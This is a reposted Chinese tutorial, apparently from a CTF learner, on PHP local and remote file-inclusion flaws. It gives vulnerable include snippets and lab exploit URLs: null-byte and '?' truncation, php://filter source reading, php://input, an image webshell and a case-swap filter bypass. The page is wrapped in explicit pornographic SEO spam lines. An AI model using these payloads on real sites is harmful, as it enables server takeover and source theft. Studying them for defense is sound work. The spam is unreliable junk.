欧美一级特黄大片做受成人-亚洲成人一区二区电影-激情熟女一区二区三区-日韩专区欧美专区国产专区

文件包含漏洞之本地包含和遠(yuǎn)程包含

文件包含漏洞介紹:

成都創(chuàng)新互聯(lián)技術(shù)團(tuán)隊(duì)十余年來(lái)致力于為客戶提供網(wǎng)站制作、網(wǎng)站建設(shè)、品牌網(wǎng)站設(shè)計(jì)、營(yíng)銷(xiāo)型網(wǎng)站、搜索引擎SEO優(yōu)化等服務(wù)。經(jīng)過(guò)多年發(fā)展,公司擁有經(jīng)驗(yàn)豐富的技術(shù)團(tuán)隊(duì),先后服務(wù)、推廣了千余家網(wǎng)站,包括各類(lèi)中小企業(yè)、企事單位、高校等機(jī)構(gòu)單位。

  程序開(kāi)發(fā)人員一般會(huì)把重復(fù)使用的函數(shù)寫(xiě)到單個(gè)文件中,需要使用某個(gè)函數(shù)時(shí)直接調(diào)用此文件,而無(wú)需再次編寫(xiě),這中文件調(diào)用的過(guò)程一般被稱(chēng)為文件包含。程序開(kāi)發(fā)人員一般希望代碼更靈活,所以將被包含的文件設(shè)置為變量,用來(lái)進(jìn)行動(dòng)態(tài)調(diào)用,但正是由于這種靈活性,從而導(dǎo)致客戶端可以調(diào)用一個(gè)惡意文件,造成文件包含漏洞。幾乎所有腳本語(yǔ)言都會(huì)提供文件包含的功能,但文件包含漏洞在PHP中居多,而在JSP、ASP、ASP.NET程序中卻非常少,甚至沒(méi)有,這是有些語(yǔ)言設(shè)計(jì)的弊端。在PHP中經(jīng)常出現(xiàn)包含漏洞,但這并不意味這其他語(yǔ)言不存在。

漏洞成因:

  文件包含漏洞的產(chǎn)生原因是在通過(guò)引入文件時(shí),引用的文件名,用戶可控,由于傳入的文件名沒(méi)有經(jīng)過(guò)合理的校驗(yàn),或者校驗(yàn)被繞過(guò),從而操作了預(yù)想之外的文件,就 可能導(dǎo)致意外的文件泄露甚至惡意的代碼注入。當(dāng)被包含的文件在服務(wù)器本地時(shí),就形成的本地文件包含漏洞,被包涵的文件在第三方服務(wù)是,就形成了遠(yuǎn)程文件包 含漏洞。

漏洞危害:

    執(zhí)行惡意代碼、包含惡意文件控制網(wǎng)站、甚至控制網(wǎng)站服務(wù)器等。


本地包含漏洞:

代碼:

<?PHP

$file=@$_GET['name'];

if($file){
	include $file;
}

?>

    

以以上這個(gè)代碼為例:

訪問(wèn):http://127.0.0.1/fileupload/include.php?name=1.txt

  1. txt文件代碼為:

<?php

phpinfo();

?>

我們可以看到txt文件里的內(nèi)容以php文件的方式執(zhí)行了;如下圖所示:

文件包含漏洞之本地包含和遠(yuǎn)程包含

再看,如果訪問(wèn):http://127.0.0.1/fileupload/include.php?name=2.jpg

2.jpg是一個(gè)圖片的一句話***;

文件包含漏洞之本地包含和遠(yuǎn)程包含

用菜刀可以直接連接,也就是說(shuō)不管后綴是什么樣,最后都會(huì)以php的形式執(zhí)行。


但是有時(shí)候會(huì)這樣,這個(gè)在ISCC國(guó)賽中遇到了,就是在最后會(huì)自動(dòng)加入.php,非常煩人。

代碼2:

<?php
    Include  $_GET['page'].".php"
?>

執(zhí)行結(jié)果如下圖:

文件包含漏洞之本地包含和遠(yuǎn)程包含

如果訪問(wèn):http://127.0.0.1/fileupload/include2.php?page=1.txt

還是報(bào)錯(cuò)。

文件包含漏洞之本地包含和遠(yuǎn)程包含

解決辦法:%00截?cái)?/p>

利用環(huán)境:php版本<5.3magic_quotes_gpc取消的(magic_quotes_gpc = off)

訪問(wèn):http://127.0.0.1/fileupload/include2.php?page=1.txt%00

文件包含漏洞之本地包含和遠(yuǎn)程包含


遠(yuǎn)程包含:

  遠(yuǎn)程的文件名不能為php可解析的擴(kuò)展名(php、php5..),而且php.ini中allow_url_fopen和allow_url_include為On才可以。

訪問(wèn):http://127.0.0.1/fileupload/include.php?name=http://127.0.0.1/1.txt

文件包含漏洞之本地包含和遠(yuǎn)程包含

如果是遇到這種情況:

文件包含漏洞之本地包含和遠(yuǎn)程包含可以用“?”或者“%00”階段;

http://127.0.0.1/fileupload/include2.php?page=http://127.0.0.1/1.txt?


讀取源碼:php://filter/read=convert.base64-encode/resource=1.txt

http://127.0.0.1/fileupload/include.php?name=php://filter/read=convert.base64-encode/resource=1.txt

讀取出來(lái)的是base64編碼的,進(jìn)行解碼就行了。

文件包含漏洞之本地包含和遠(yuǎn)程包含

php://input的用法

php://input

文件包含漏洞之本地包含和遠(yuǎn)程包含

偽協(xié)議繞過(guò)大小寫(xiě):

<?php
    
    if(isset($_GET['f'])){
        if(strpos($_GET['f'],"php") !== False){
            die("error...");
        }
        else{
            include($_GET['f'] . '.php');
        }
    }
    
?>

http://127.0.0.1//index.php?f=pHP://filter/read=convert.base64-encode/resource=index

readfile讀取文件,不可以getshell

<?php
	
	 @readfile($_GET["file"]);
?>

總結(jié):這些在iscc的國(guó)賽賽中出現(xiàn)過(guò),如果當(dāng)時(shí)會(huì)階段或者會(huì)讀取源碼,也就能獲獎(jiǎng)了,學(xué)無(wú)止境,加油吧。


分享文章:文件包含漏洞之本地包含和遠(yuǎn)程包含
轉(zhuǎn)載源于:http://aaarwkj.com/article24/igooce.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供定制開(kāi)發(fā)、外貿(mào)建站、虛擬主機(jī)、網(wǎng)站內(nèi)鏈品牌網(wǎng)站設(shè)計(jì)、網(wǎng)站制作

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

網(wǎng)站托管運(yùn)營(yíng)
日本免费一区二区三区的电影啊| 日韩精品在线观看天堂| 日本女优久久精品观看| 激情婷婷亚洲五月综合网| 亚州精品少妇久久久久久| 热久久这里只有精品视频| 日韩欧美亚洲国产资源| 精品爆白浆一区二区三区| 国产精品欧美久久久久久| 亚洲三级成人一区在线| 日韩美女av在线播放| 中文字幕日韩午夜精品| 免费av男人天堂亚洲天堂| 免费av在线网址网站| 日韩二区三区在线视频| 国产一级二级三级在线电影| 久久夜色精品国产高清不卡| 久久免费观看性生活片| 国产午夜在线观看免费视频| 精品蜜桃臀91人少妇| 少妇高潮喷水下面的水| 97视频在线观看免费| 三级av电影中文字幕| 亚洲精品一区二区激情| 人人妻人人澡人人爽人人dvd| av在线手机中文字幕| 国产亚洲中文久久网久久| 日本午夜专区一区二区| 亚洲一区二区三区精品乱码| 亚洲女人淫片在线观看| 成人黄网站色大片免费| 日韩欧美精品视频一区| 日本午夜熟女九色视频| 国产精品亚洲一区二区在| 欧美一区二区黑人巨大| 成年黄网站免费视频大全| 亚洲欧美一区二区粉嫩| 久久麻豆精亚洲av品国产一区| 国产一级二级三级黄色| 亚洲熟女少妇视频自拍| 日韩三级在线观看av|